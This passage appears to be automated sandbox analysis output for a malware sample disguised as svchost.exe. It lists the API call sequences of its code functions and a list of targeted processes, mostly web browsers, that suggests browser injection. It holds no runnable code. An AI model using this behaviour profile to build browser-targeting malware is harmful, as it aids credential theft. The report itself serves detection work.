    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrSt
rIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrSt
rIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrSt
rIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrSt
rIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe2_2_02BC1900
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008E78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_008E1900
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008D3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_008978A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_00896CA0
